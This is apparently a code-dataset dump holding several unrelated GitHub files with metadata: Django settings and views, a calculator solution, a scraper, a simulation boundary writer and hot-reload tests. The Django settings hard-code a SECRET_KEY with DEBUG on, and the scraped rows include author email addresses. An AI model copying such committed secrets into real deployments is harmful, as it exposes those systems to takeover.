blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
"""
Django settings for config project.
Generated by 'django-admin startproject' using Django 3.0.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control — rotate it and load
# it from the environment (e.g. os.environ) before any production deployment.
SECRET_KEY = '@ruupwt8cksg8gbagh^xzmsq%$_!4--vaq$v21awl$60=)k8gh'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []

# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.sites',  # required by django-allauth (see SITE_ID below)
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'corona',
    # allauth
    'allauth',
    'allauth.account',
    'allauth.socialaccount',
    # provider
    'allauth.socialaccount.providers.google'
]

SITE_ID = 1
SOCIALACCOUNT_EMAIL_VERIFICATION = 'none'
# Redirect target after login / logout.
LOGIN_REDIRECT_URL = "/allauth1/login1/"
ACCOUNT_LOGOUT_REDIRECT_URL = "/allauth1/login1/"

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'config.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        # NOTE(review): single-argument join is a no-op; this is a path
        # relative to the working directory — confirm that is intended.
        'DIRS': [os.path.join("corona/templates")],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'config.wsgi.application'

# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
    }
}

# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
# Fixed typo: this was spelled "STATICFIELS_DIRS", a name Django silently
# ignores, so any entry added here previously had no effect.
STATICFILES_DIRS = [
    # os.path.join(BASE_DIR, 'corona', 'static')
]
STATIC_ROOT = ""
"qudcks0703@naver.com"
] | qudcks0703@naver.com |
dd746b74e43acf7d47b6ac1e5af311e62ab6dd16 | ae12996324ff89489ded4c10163f7ff9919d080b | /LeetCodePython/BasicCalculator.py | c2378b22e407db140bf364ae250e27a2830a46bc | [] | no_license | DeanHe/Practice | 31f1f2522f3e7a35dc57f6c1ae74487ad044e2df | 3230cda09ad345f71bb1537cb66124ec051de3a5 | refs/heads/master | 2023-07-05T20:31:33.033409 | 2023-07-01T18:02:32 | 2023-07-01T18:02:32 | 149,399,927 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,610 | py | """
Given a string s representing a valid expression, implement a basic calculator to evaluate it, and return the result of the evaluation.
Note: You are not allowed to use any built-in function which evaluates strings as mathematical expressions, such as eval().
Example 1:
Input: s = "1 + 1"
Output: 2
Example 2:
Input: s = " 2-1 + 2 "
Output: 3
Example 3:
Input: s = "(1+(4+5+2)-3)+(6+8)"
Output: 23
Constraints:
1 <= s.length <= 3 * 105
s consists of digits, '+', '-', '(', ')', and ' '.
s represents a valid expression.
'+' is not used as a unary operation (i.e., "+1" and "+(2 + 3)" is invalid).
'-' could be used as a unary operation (i.e., "-1" and "-(2 + 3)" is valid).
There will be no two consecutive operators in the input.
Every number and running calculation will fit in a signed 32-bit integer.
"""
class BasicCalculator:
    """Evaluates expressions of digits, '+', '-', parentheses and spaces."""

    def calculate(self, s: str) -> int:
        """Return the integer value of the expression *s*.

        Single left-to-right pass keeping a running total for the current
        nesting level.  On '(' the current total and pending sign are pushed;
        on ')' the parenthesised sub-result is folded back into the saved
        frame.  Unary minus works because a '-' simply flips the sign applied
        to whatever term (number or parenthesised group) comes next.
        """
        total = 0       # value accumulated at the current nesting level
        number = 0      # multi-digit number currently being scanned
        polarity = 1    # sign (+1/-1) to apply to the next term
        frames = []     # flattened stack of (outer total, outer sign) pairs

        for ch in s:
            if ch.isdigit():
                number = number * 10 + int(ch)
            elif ch in '+-':
                total += polarity * number
                number = 0
                polarity = 1 if ch == '+' else -1
            elif ch == '(':
                frames.append(total)
                frames.append(polarity)
                polarity = 1
                total = 0
            elif ch == ')':
                total += polarity * number
                number = 0
                total *= frames.pop()   # sign that preceded the '('
                total += frames.pop()   # total accumulated before the '('
            # any other character (whitespace) is ignored

        if number != 0:
            total += polarity * number
        return total
"tengda.he@gmail.com"
] | tengda.he@gmail.com |
68e5b4ce8d27c031b4815be6d870268a38d0e844 | 77d2276457369e0c6d7e3c52569a7c4bc52dcae7 | /settingsWidget.py | 37779cc5521f8d906acb00cb5a65a63c7a47269a | [] | no_license | lm30/repairconsole | c537dd3edf15af96fbdef14807dd0cebe70c67a0 | d30488900c8ea5f575769a82f0498057d2a5aa21 | refs/heads/main | 2023-02-10T08:07:10.126932 | 2021-01-08T16:09:46 | 2021-01-08T16:09:46 | 313,378,637 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,382 | py | from tkinter import *
import tkinter as tk
from overdueTable import OverdueTable
class SettingsWidget(object):
    """Loads application settings from a plain-text file.

    Each non-empty line is expected to look like ``name = value``; only the
    first and last whitespace-separated tokens are used.  ``True``/``true``
    and ``False``/``false`` become booleans, anything else stays a string.
    """

    def __init__(self, root=None, **kwargs):
        self.root = root
        self.settings = {}
        # NOTE: callers pass the keyword as "settingFile" (no 's').
        self.settingsFile = kwargs.pop("settingFile")
        self.readFromFile()

    def readFromFile(self):
        """Parse the settings file into the ``self.settings`` dict."""
        with open(self.settingsFile, "r") as handle:
            for raw in handle:
                tokens = raw.split()
                key, value = tokens[0], tokens[-1]
                if value in ("True", "true"):
                    self.settings[key] = True
                elif value in ("False", "false"):
                    self.settings[key] = False
                else:
                    self.settings[key] = value
        print(self.settings)

    def setRepairTable(self, table):
        """Attach a repair table and push colour/email settings into it."""
        self.repairTable = table
        # colours
        self.repairTable.setOverdueColor(self.settings["overdue_color"])
        self.repairTable.setFinishedColor(self.settings["finished_color"])
        self.repairTable.refreshRepairs()
        # email behaviour
        self.repairTable.setSendFinishedEmails(self.settings["auto_emails_finish"])

    def setOverdue(self):
        """Propagate the configured overdue threshold to OverdueTable."""
        OverdueTable.overdue = int(self.settings["overdue_days"])

    def writeToFile(self):
        # Persisting settings back to disk is not implemented yet.
        pass
"lm3081@columbia.edu"
] | lm3081@columbia.edu |
2ab9c5759e332a8b4f1f8690e8e843b4b2547ec2 | 675fee420fd6d95022158ab15ae99451bf1ed94e | /exercises_p2/ex_1.py | 0e673143f405e1a227c913ed19875b9e2a2610f1 | [] | no_license | ogabriel/python_CS | 4e9b305896b6b0ca4bc68eb0b3e32ee73c032fa8 | ca59abe5dfdff3b935a5e3a06dae32517543cefb | refs/heads/master | 2020-07-31T20:37:47.870742 | 2019-11-14T04:13:06 | 2019-11-14T04:13:06 | 210,746,446 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 365 | py | # 1. Crie uma classe livro em python que possua os atributos nome, autor, sinopse e editora, seus dados precisam ser privados e populados no método construtor.
class Book:
def __init__(self, name, author, sinopsis, publisher):
self.__name = name
self.__author = author
self.__sinopsis = sinopsis
self.__publisher = publisher
| [
"gabrieloliver8991@gmail.com"
] | gabrieloliver8991@gmail.com |
5ec1afa9ae4cf5f61aea9e5fe0789a36c651733c | 09b988e143a20470a2383568371a7f6d11db0590 | /WriteBoundary.py | b2da7a386bc16a33f17adb2678996cb9ef8b3e29 | [] | no_license | mflattery/CharUtils | 17949c11252e587db29128cbf662f8950922b9fc | e32a7f7d2981dd33a3139c665f0773d94cc09b05 | refs/heads/master | 2020-08-19T03:01:45.228036 | 2019-10-17T19:26:54 | 2019-10-17T19:26:54 | 215,869,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,849 | py | #!/usr/bin/python
def WriteBoundary(currentshape, charbcfile='CHAR/Boundary/Working.sideset.1.bc', conefile='CHAR/Boundary/aero.bc'):
    """Write a CHAR aero boundary-condition file from a time-resolved surface table.

    Parameters
    ----------
    currentshape : pandas.DataFrame
        Must carry columns ``t``, ``x``, ``y``, ``film_coeff``, ``h_rec``,
        ``P`` and ``degree_of_turbulence`` — one row per surface point per
        time value.
    charbcfile : str
        Output path for the boundary-condition file.
    conefile : str
        Currently unused; kept so existing callers that pass it keep working
        (a 1-D cone BC writer used to live here).

    File layout: a variables header, the point count, the (x, y, 0) surface
    coordinates from the first time slice, the number of time values, then
    for each time value the time followed by one data line per point.
    """
    coords = []
    coords.append('variables = film_coeff h_rec P degree_of_turbulence')
    times = currentshape.t.unique()
    # Geometry is taken from the first time slice only, sorted along x;
    # assumes every time slice shares the same point set — TODO confirm.
    DFi = currentshape[currentshape['t'] == times[0]].sort_values(by='x')
    xs = DFi.x.tolist()
    ys = DFi.y.tolist()
    coords.append(str(len(xs)))
    for i, j in zip(xs, ys):
        coords.append('{0:.8f} {1:.8f} {2:.1f}'.format(i, j, 0))
    print('Writing AeroBC File')
    coords.append(str(len(times)))
    for t in times:
        coords.append(str(t))
        DFi = currentshape[currentshape['t'] == t].sort_values(by='x')
        for i in DFi.index:
            coords.append('{0:.8f} {1:.3f} {2:.4f} {3:.1f} '.format(
                DFi.loc[i].film_coeff, DFi.loc[i].h_rec,
                DFi.loc[i].P, DFi.loc[i].degree_of_turbulence))
    print('writing Boundary condition file: {} '.format(charbcfile))
    with open(charbcfile, 'w') as f:
        # The context manager closes the file; the explicit f.close() that
        # used to follow here was redundant and has been removed.
        f.writelines("%s\n" % line for line in coords)
"noreply@github.com"
] | noreply@github.com |
b8c181b7036db86385ac19a47e29672fc5271787 | 5fb9a3bad36829007c55e026c57a622f929c9862 | /MyFirstSite/webexample/views.py | c603c42b36a15c813f0242b3e10e897bcfed5bda | [] | no_license | max-krai/FirstSite | 3ad35455692a9a8b6faa0c2b098af40a2e29eb72 | dccd77c1f94b92c4b67e2985655839c4a7700e53 | refs/heads/main | 2023-07-28T11:28:32.912703 | 2021-09-11T08:08:10 | 2021-09-11T08:08:10 | 400,777,162 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 769 | py | from django.shortcuts import render, redirect
from .models import Task
from .forms import TaskForm
def index(request):
    """Home page: render the index template with every Task."""
    tasks = Task.objects.all()
    return render(request,'webexample/index.html', {'title': 'Главная страница сайта', 'tasks': tasks})
def about(request):
    """Static 'about' page; no context needed."""
    return render(request,'webexample/about.html')
def create(request):
    """Create a new Task.

    On a valid POST the task is saved and the user is redirected home.  On an
    invalid POST the *bound* form is kept so the template can show the user's
    input and the form's validation errors — the original code rebuilt an
    empty ``TaskForm()`` unconditionally, which discarded both.
    """
    error = ''
    if request.method == 'POST':
        form = TaskForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('home')
        error = 'Форма была неверной'
    else:
        form = TaskForm()
    context = {
        'form': form,
        'error': error
    }
    return render(request, 'webexample/create.html', context)
"max-krai2014@yandex.ru"
] | max-krai2014@yandex.ru |
64545c0ee250c3ac77e43944cc077ea100d12e62 | 4411221e8ff141f2aba6e5f446126249c613fc5c | /tcdm/TCDM1_2/tcdm1_2.py | 81aa9f1b23a652308b40e8cd82945633b183911f | [] | no_license | jimlyall-q/test-gen | 15e6319e9646719768cae7cc5175eda274833001 | 7da7b986dd0049fc7d05cb869b45ca408e3bf05b | refs/heads/main | 2023-05-26T23:55:14.624502 | 2021-06-17T08:58:46 | 2021-06-17T08:58:46 | 377,731,790 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,854 | py |
from asyncio import sleep
from app.test_engine.logger import test_engine_logger as logger
from app.test_engine.models import TestCase, TestStep
from app.user_prompt_support.prompt_request import PromptRequest
from app.user_prompt_support.user_prompt_manager import (
PromptExchange,
user_prompt_manager,
)
class TCDM1_2(TestCase):
    """Test case 11.2.3.2: DUT event behaviour across reboot, shutdown and
    factory reset.

    The verification itself (StartUp / ShutDown / Leave event ordering,
    dropped messages) is performed by the operator / harness; this class
    only declares and logs the ordered steps.
    """

    def create_test_steps(self) -> None:
        """Declare the ordered steps shown by the test harness."""
        # NOTE(review): two consecutive steps share the "11.2.3.2-1" label —
        # possibly a copy-paste slip in the step numbering; confirm against
        # the test plan.
        self.test_steps = [
            TestStep("Test Step 11.2.3.2-0: Reboot the DUT"),
            TestStep("Test Step 11.2.3.2-1: Shut down the DUT"),
            TestStep("Test Step 11.2.3.2-1: Send events/messages to DUT from TH"),
            TestStep("Test Step 11.2.3.2-2: Factory Reset the DUT"),
        ]

    async def setup(self) -> None:
        # No preconditions required for this case.
        logger.info("No setup")

    async def execute(self) -> None:
        """Walk the declared steps, logging each and advancing the harness."""
        # 11.2.3.2-0: Reboot the DUT
        # Verify that the DUT sends the StartUp event before other events to TH
        logger.info("11.2.3.2-0: Reboot the DUT")
        self.next_step()
        # 11.2.3.2-1: Shut down the DUT
        # Verify that the DUT sends the ShutDown event to TH before shutting down
        # No other event from the DUT should be sent to TH
        logger.info("11.2.3.2-1: Shut down the DUT")
        self.next_step()
        # 11.2.3.2-1: Send events/messages to DUT from TH
        # Verify that the messages sent to the DUT are dropped
        logger.info("11.2.3.2-1: Send events/messages to DUT from TH")
        self.next_step()
        # 11.2.3.2-2: Factory Reset the DUT
        # Verify that the DUT sends the Leave event to TH
        # No more events from DUT should be sent
        # Verify incoming messages to DUT are dropped
        logger.info("11.2.3.2-2: Factory Reset the DUT")
        self.next_step()

    async def cleanup(self) -> None:
        # Nothing to tear down.
        logger.info("No cleanup")
| [
"jim.lyall@qorvo.com"
] | jim.lyall@qorvo.com |
158b82911d79e6df1f08c7004ba7d66956b546a2 | 122b69168f02ea27d6e3fae8a3cbd374c505467e | /djangoAelz/aelz/aelz/views.py | 008d38a970d7c11494510a13ba5af09579b6baaf | [] | no_license | elizarius/backendSamples | 2f05352214bbbbee5c0fba2ab04e7c8025d44182 | 04392612924ac54755e87c450102cc4698e87b8e | refs/heads/master | 2023-08-05T19:34:50.774223 | 2023-07-27T08:44:41 | 2023-07-27T08:50:35 | 136,711,545 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 107 | py | from django.http import HttpResponse
def index(request):
    """Root view: return a static greeting (no template rendering)."""
    return HttpResponse('Hello ***AELZ*** world')
"alexander.elizarov@ericsson.com"
] | alexander.elizarov@ericsson.com |
108f8469a44320ab72aeef7321914bf7aacec776 | 0d415744dd0987949184e6da98a8c5023d104ef3 | /parse/A5ChuangYeParse.py | 6701ba2b7007d1556af1ca86ad53345887a674ce | [] | no_license | MaGuiSen/url_catch | ba4aabac8329a5d7b8d653c8423c73c26ddb0a21 | 125521030a4af5cc1226b2b38ca426fc28db8be5 | refs/heads/master | 2021-05-03T06:44:01.282452 | 2018-02-09T10:00:16 | 2018-02-09T10:00:16 | 120,601,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,889 | py | # -*- coding: utf-8 -*-
from scrapy import Selector
from util import DateUtil
# A5 Chuangye (A5 startup news) article detail-page parser.
def parse(html):
    """Parse an A5 article page into a dict with title, cleaned content HTML,
    post date and styling hints; returns None when no content area is found.
    """
    response = Selector(text=html)
    # Locate the main content area.
    content_html = response.xpath(u'//div[@class="content"]')
    if not content_html:
        return None
    # Strip unwanted inner nodes: scripts, styles, label bars and iframes.
    content_items = content_html.xpath(u'*[not(name(.)="script") and not(name(.)="style") '
                                       u' and not(@class="sherry_labels")'
                                       u' and not(name(.)="iframe")]|text()')
    if not content_items:
        return None
    date_srf = response.xpath(u'//div[@class="source"]/text()').extract()
    date_srf = u''.join(date_srf).strip()
    # The source line looks like "<date> 来源:<source>"; split on the
    # 来源 ("source:") marker — the split token is site markup, keep as-is.
    date_srf = date_srf.split(u'来源:')
    post_date = u''
    src_ref = u''
    if len(date_srf):
        post_date = date_srf[0]
        post_date = post_date.strip()
    if len(date_srf) > 1:
        src_ref = date_srf[1]
    if not src_ref:
        # Fall back to the explicit source link when the text had no marker.
        src_ref = response.xpath(u'//div[@class="source"]/a[@class="source-from"]/text()').extract_first(u'')
    # Article title.
    title = response.xpath(u'//div[@class="sherry_title"]/h1/text()').extract_first(u'')
    style_in_list = []
    style_need_replace = [
        {u'old': u'#eaeaea', u'new': u'#ffffff'},
    ]
    # Author — not extracted for this site.
    post_user = u''
    # Tags — not extracted for this site.
    tags = u''
    # Re-assemble the cleaned content into a fresh wrapper div.
    content_html = u"""<div class="content">
    %s
    </div>
    """ % (u''.join(content_items.extract()),)
    content_item = {
        u'title': title,
        u'content_html': content_html,
        u'post_date': post_date,
        u'style_in_list': style_in_list,
        u'style_need_replace': style_need_replace,
    }
    return content_item
if __name__ == '__main__':
pass
| [
"1059876295@qq.com"
] | 1059876295@qq.com |
e43a859a330d69b5393baa2c5770ed5bbb2c5619 | 6b15f5cab9091792024f8756e2cf0bab554bcfe2 | /Tedwebsite/speakers/migrations/0003_auto_20201004_2200.py | 225063aa75660068629ad9684916dcf5325faf3f | [] | no_license | Jaikishan30/Website | df1f4e853af99099bc4de70dd61ee50c3df6bfe0 | bb3467dc4283de02592c80836b001308d77f2172 | refs/heads/master | 2023-08-29T07:23:02.276495 | 2021-10-25T18:32:47 | 2021-10-25T18:32:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,531 | py | # Generated by Django 2.2.6 on 2020-10-04 16:30
from django.db import migrations, models
class Migration(migrations.Migration):
    """Schema changes for the speaker-nomination form (auto-generated).

    Renames ``comment``/``name`` to clearer nominee/nominator field names and
    adds the free-text fields collected by the nomination form.  The added
    fields use a throw-away default of ``'N/A'`` with
    ``preserve_default=False`` only so existing rows can be back-filled
    during the migration.
    """

    dependencies = [
        ('speakers', '0002_auto_20200908_1359'),
    ]

    operations = [
        migrations.RenameField(
            model_name='speaker',
            old_name='comment',
            new_name='know_speaker_description',
        ),
        migrations.RenameField(
            model_name='speaker',
            old_name='name',
            new_name='nominator_name',
        ),
        migrations.AddField(
            model_name='speaker',
            name='nominee_about',
            field=models.TextField(default='N/A'),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='speaker',
            name='nominee_name',
            field=models.CharField(default='N/A', max_length=200),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='speaker',
            name='social_links',
            field=models.TextField(default='N/A'),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='speaker',
            name='spoken_publicly_links',
            field=models.TextField(default='N/A'),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='speaker',
            name='talk_about',
            field=models.TextField(default='N/A'),
            preserve_default=False,
        ),
    ]
| [
"ireneholmes221999@gmail.com"
] | ireneholmes221999@gmail.com |
c4f8026e28db67ae6e7ad6f1d7d31c16fda41a3a | f1caec328a46a3b9cd5cf732f97b5cf358c06b07 | /tests/test_codetools.py | b56e3c358fc6c50c159546c355644c1673967758 | [
"MIT"
] | permissive | gc-ss/jurigged | 878a4a815e618f47b6c459cfa434962fd81754bb | 5de42f013ea07c31fdfba20fe923d86936e089ec | refs/heads/master | 2023-04-04T20:52:17.105961 | 2021-04-20T22:18:07 | 2021-04-20T22:18:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,957 | py | import math
import os
from types import SimpleNamespace as NS
import pytest
from jurigged.codetools import CodeFile, StaleException
from jurigged.utils import locate
from .common import TemporaryModule
from .snippets import apple
class CodeCollection:
    """Loads a family of snippet files sharing a basename (e.g.
    ``ballon:main``, ``ballon:v2``) into a temporary module plus one
    CodeFile per variant.

    ``self.main`` is the CodeFile associated with the live module;
    ``self.cf`` holds a CodeFile per variant and ``self.files`` the
    matching file paths.
    """

    def __init__(self, tmod, basename):
        self.tmod = tmod
        self.basename = basename
        # Variant names are the ``:<variant>`` suffixes of matching snippet files.
        self.variants = {
            name.split(".py")[0].split(":")[1]
            for name in os.listdir(
                os.path.join(os.path.dirname(__file__), "snippets")
            )
            if name.startswith(basename)
        }
        module = tmod.imp(f"{basename}:main")
        main_cf = CodeFile(module.__file__, module.__name__)
        main_cf.associate(module)
        self.module = module
        self.main = main_cf
        self.read_codefiles()

    def read_codefiles(self):
        """(Re)parse every variant into a fresh CodeFile.

        Merging mutates CodeFile state, so tests call this again between
        successive merges.
        """
        files = {
            variant: self.module.__file__
            if variant == "main"
            else self.tmod.transfer(f"{self.basename}:{variant}")[1]
            for variant in self.variants
        }
        self.files = NS(**files)
        self.cf = NS(
            **{
                variant: CodeFile(file, self.module.__name__)
                for variant, file in files.items()
            }
        )

    def read(self, name="main"):
        """Return the current on-disk text of the given variant."""
        path = getattr(self.files, name)
        with open(path) as f:
            return f.read()

    def write(self, name, contents):
        """Overwrite the given variant's file with *contents*."""
        path = getattr(self.files, name)
        open(path, "w").write(contents)
@pytest.fixture
def tmod():
    # The original signature was ``def tmod(scope="module")``: pytest treats
    # ``scope`` there as an ordinary default *argument*, not fixture scope,
    # so it had no effect.  The dead parameter is removed; behaviour
    # (default function scope) is unchanged.  Use
    # ``@pytest.fixture(scope="module")`` if module-level caching is
    # actually desired.
    return TemporaryModule()


@pytest.fixture
def apple_code():
    # Same dead ``scope="module"`` parameter removed here — see ``tmod``.
    cf = CodeFile(apple.__file__, apple.__name__)
    cf.associate(apple)
    return cf


# One CodeCollection fixture per snippet family used by the tests below.
@pytest.fixture
def ballon(tmod):
    return CodeCollection(tmod, "ballon")


@pytest.fixture
def chips(tmod):
    return CodeCollection(tmod, "chips")


@pytest.fixture
def dandelion(tmod):
    return CodeCollection(tmod, "dandelion")


@pytest.fixture
def elephant(tmod):
    return CodeCollection(tmod, "elephant")


@pytest.fixture
def firmament(tmod):
    return CodeCollection(tmod, "firmament")


@pytest.fixture
def glamour(tmod):
    return CodeCollection(tmod, "glamour")


@pytest.fixture
def iguana(tmod):
    return CodeCollection(tmod, "iguana")
def test_collect(apple_code):
    # The catalogue must index every definition in the apple snippet both by
    # position ("Kind@line") and by dotted path, each mapped to the live
    # Python object(s) associated with it.
    cat = {
        f"{k[0]}@{k[2]}" if isinstance(k, tuple) else k: set(v.objects)
        for k, v in apple_code.code.catalogue().items()
        if set(v.objects)
    }
    assert cat == {
        "ModuleCode@1": {apple},
        "FunctionCode@1": {apple.crunch},
        "FunctionCode@6": {apple.breakfast},
        "FunctionCode@23": {apple.Orchard.cortland},
        "ClassCode@13": {apple.Orchard},
        "FunctionCode@14": {apple.Orchard.mcintosh},
        "FunctionCode@18": {apple.Orchard.honeycrisp.__func__},
        "FunctionCode@29": {apple.juggle},
        "FunctionCode@36": {apple.pomme},
        "FunctionCode@45": {apple.arbre},
        "FunctionCode@46": {apple.pommier},
        "FunctionCode@52": {apple.pommier.__wrapped__},
        "ClassCode@57": {apple.FakeApple},
        "FunctionCode@58": {apple.FakeApple.color.fget},
        "FunctionCode@62": {apple.FakeApple.color.fset},
        "tests.snippets.apple": {apple},
        "tests.snippets.apple.crunch": {apple.crunch},
        "tests.snippets.apple.breakfast": {apple.breakfast},
        "tests.snippets.apple.Orchard.cortland": {apple.Orchard.cortland},
        "tests.snippets.apple.Orchard": {apple.Orchard},
        "tests.snippets.apple.Orchard.mcintosh": {apple.Orchard.mcintosh},
        "tests.snippets.apple.Orchard.honeycrisp": {
            apple.Orchard.honeycrisp.__func__
        },
        "tests.snippets.apple.juggle": {apple.juggle},
        "tests.snippets.apple.pomme": {apple.pomme},
        "tests.snippets.apple.arbre": {apple.arbre},
        "tests.snippets.apple.arbre.branche": {apple.pommier},
        "tests.snippets.apple.pommier": {apple.pommier.__wrapped__},
        "tests.snippets.apple.FakeApple": {apple.FakeApple},
        "tests.snippets.apple.FakeApple.color": {apple.FakeApple.color.fset},
    }
# Merging v2 must swap in new definitions while keeping previously captured
# references (bound methods, plain function refs) pointing at the new code.
def test_merge(ballon):
    radius = 10
    cir = ballon.module.FlatCircle(radius)
    inflate = ballon.module.inflate
    volume = cir.volume
    # Initial definitions
    assert ballon.module.inflate(5) == 10
    assert inflate(5) == 10
    assert cir.volume() == -1
    assert volume() == -1
    assert cir.unsightly() == "yuck"
    with pytest.raises(AttributeError):
        cir.circumference()
    assert ballon.module.uninteresting() is None
    # Merge the new code
    ballon.main.merge(ballon.cf.v2)
    # New definitions should be active
    assert ballon.module.inflate(5) == 15
    assert inflate(5) == 15
    assert ballon.module.deflate(15) == 5
    assert cir.volume() == 0
    assert volume() == 0
    with pytest.raises(AttributeError):
        cir.unsightly()
    assert cir.circumference() == 2 * math.pi * radius
    with pytest.raises(AttributeError):
        ballon.module.uninteresting()


# With allow_deletions=False, removed definitions must survive the merge.
def test_merge_partial(ballon):
    radius = 10
    cir = ballon.module.FlatCircle(radius)
    assert cir.volume() == -1
    assert cir.unsightly() == "yuck"
    ballon.main.merge(ballon.cf.v2, allow_deletions=False)
    assert cir.volume() == 0
    assert cir.unsightly() == "yuck"


# Repeated merges in both directions must be fully reversible.
def test_merge_back_and_forth(ballon):
    radius = 10
    cir = ballon.module.FlatCircle(radius)
    inflate = ballon.module.inflate
    volume = cir.volume
    def _initial():
        # Initial definitions
        assert ballon.module.inflate(5) == 10
        assert inflate(5) == 10
        assert cir.volume() == -1
        assert volume() == -1
        assert cir.unsightly() == "yuck"
        with pytest.raises(AttributeError):
            cir.circumference()
        assert ballon.module.uninteresting() is None
    def _new():
        # New definitions should be active
        assert ballon.module.inflate(5) == 15
        assert inflate(5) == 15
        assert ballon.module.deflate(15) == 5
        assert cir.volume() == 0
        assert volume() == 0
        with pytest.raises(AttributeError):
            cir.unsightly()
        assert cir.circumference() == 2 * math.pi * radius
        with pytest.raises(AttributeError):
            ballon.module.uninteresting()
    _initial()
    # We must re-read the codefiles each time because the definitions
    # may be modified by merge.
    ballon.read_codefiles()
    ballon.main.merge(ballon.cf.v2)
    _new()
    ballon.read_codefiles()
    ballon.main.merge(ballon.cf.main)
    _initial()
    ballon.read_codefiles()
    ballon.main.merge(ballon.cf.v2)
    _new()
    ballon.read_codefiles()
    ballon.main.merge(ballon.cf.main)
    _initial()
    ballon.read_codefiles()
    ballon.main.merge(ballon.cf.v2)
    _new()
# Changing a decorated function's signature must survive the decorator.
def test_merge_decorators(chips):
    assert chips.module.munch(4) == 6
    chips.main.merge(chips.cf.mod, allow_deletions=False)
    assert chips.module.munch(4, 2) == 8


# Replacing the decorated function body takes effect through the decorator.
def test_merge_decorators_change(chips):
    assert chips.module.munch(4) == 6
    chips.main.merge(chips.cf.bad, allow_deletions=False)
    assert chips.module.munch(4) == 17


# Changing only the decorator re-wraps the function.
def test_change_decorator(chips):
    assert chips.module.munch(4) == 6
    chips.main.merge(chips.cf.newdeco, allow_deletions=False)
    assert chips.module.munch(4) == 8


# Two successive decorator changes both take effect.
def test_change_decorator_multiple(chips):
    assert chips.module.munch(4) == 6
    chips.main.merge(chips.cf.newdeco, allow_deletions=False)
    assert chips.module.munch(4) == 8
    chips.main.merge(chips.cf.newdeco2, allow_deletions=False)
    assert chips.module.munch(4) == 10


# Decorator change followed by function change composes correctly...
def test_change_decorator_then_fn(chips):
    assert chips.module.munch(4) == 6
    chips.main.merge(chips.cf.newdeco, allow_deletions=False)
    chips.main.merge(chips.cf.newfn, allow_deletions=False)
    assert chips.module.munch(4) == 404


# ...and so does the reverse order.
def test_change_fn_then_decorator(chips):
    assert chips.module.munch(4) == 6
    chips.main.merge(chips.cf.newfn, allow_deletions=False)
    chips.main.merge(chips.cf.newdeco, allow_deletions=False)
    assert chips.module.munch(4) == 404
# commit() with no pending merge must leave the file untouched.
